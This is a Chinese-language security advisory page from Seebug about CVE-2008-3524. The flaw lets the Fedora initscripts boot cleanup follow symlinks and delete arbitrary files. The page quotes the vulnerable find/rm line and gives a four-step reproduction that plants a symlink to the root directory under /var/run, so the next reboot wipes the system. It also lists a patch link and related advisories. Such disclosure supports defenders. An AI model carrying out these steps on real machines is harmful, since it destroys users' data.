Lucene search
RootSSV:4120HistorySep 27, 2008 - 12:00 a.m.
Fedora initscripts任意文件删除漏洞
2008-09-2700:00:00
Root
www.seebug.org
9
EPSS
0
Percentile
5.1%
BUGTRAQ ID: 31385
CVE ID:CVE-2008-3524
CNCVE ID:CNCVE-20083524
Fedora是一款基于Linux的发行版本。
Fedora initscripts存在问题,本地攻击者可以利用漏洞删除任意文件。
/etc/rc.sysinit包含如下脚本:
| find -L /var/lock /var/run ! -type d -exec rm -f {} ;
在每次启动过程中,在/var/run或/var/lock目录下会有守护程序可写子目录(如/var/run/openldap),当守护程序被破坏时,攻击者可以建立
| /var/run/openldap/foo -> /
符号连接将在下个启动过程中清除整个系统。
RedHat initscripts 8.76.3
RedHat Fedora 9 0
可参考如下安全公告获得补丁信息:
<a href=“https://bugzilla.redhat.com/show_bug.cgi?id=458652” target=“_blank”>https://bugzilla.redhat.com/show_bug.cgi?id=458652</a>
1. mkdir /var/run/foo
2. chown nobody:nobody /var/run/foo
3. runuser nobody -s /bin/sh 'ln -s / /var/run/foo/bar'
4. reboot
Related
nessus
nessus
NewStart CGSL CORE 5.04 / MAIN 5.04 : initscripts Vulnerability (NS-SA-2021-0110)
2021-10-28 00:00:00
NewStart CGSL MAIN 6.02 : initscripts Vulnerability (NS-SA-2022-0069)
2022-05-09 00:00:00
Fedora 9 : initscripts-8.76.3-1 (2008-7667)
2008-09-25 00:00:00
cvelist
cvelist
CVE-2008-3524
2008-09-29 17:00:00
CVE-2008-4832
2008-11-17 23:00:00
cve
cve
CVE-2008-3524
2008-09-29 17:17:29
CVE-2008-4832
2008-11-17 23:30:00
openvas
openvas
Fedora Update for initscripts FEDORA-2008-7667
2009-02-17 00:00:00
Fedora Update for initscripts FEDORA-2008-7667
2009-02-17 00:00:00
prion
prion
Design/Logic Flaw
2008-09-29 17:17:00
Race condition
2008-11-17 23:30:00
fedora
fedora
[SECURITY] Fedora 9 Update: initscripts-8.76.3-1
2008-09-25 00:15:02
nvd
nvd
CVE-2008-3524
2008-09-29 17:17:29
CVE-2008-4832
2008-11-17 23:30:00
securityvulns
securityvulns
rPSA-2008-0318-1 initscripts
2008-11-14 00:00:00
rPath Linux symbolic links vulnerability
2008-11-14 00:00:00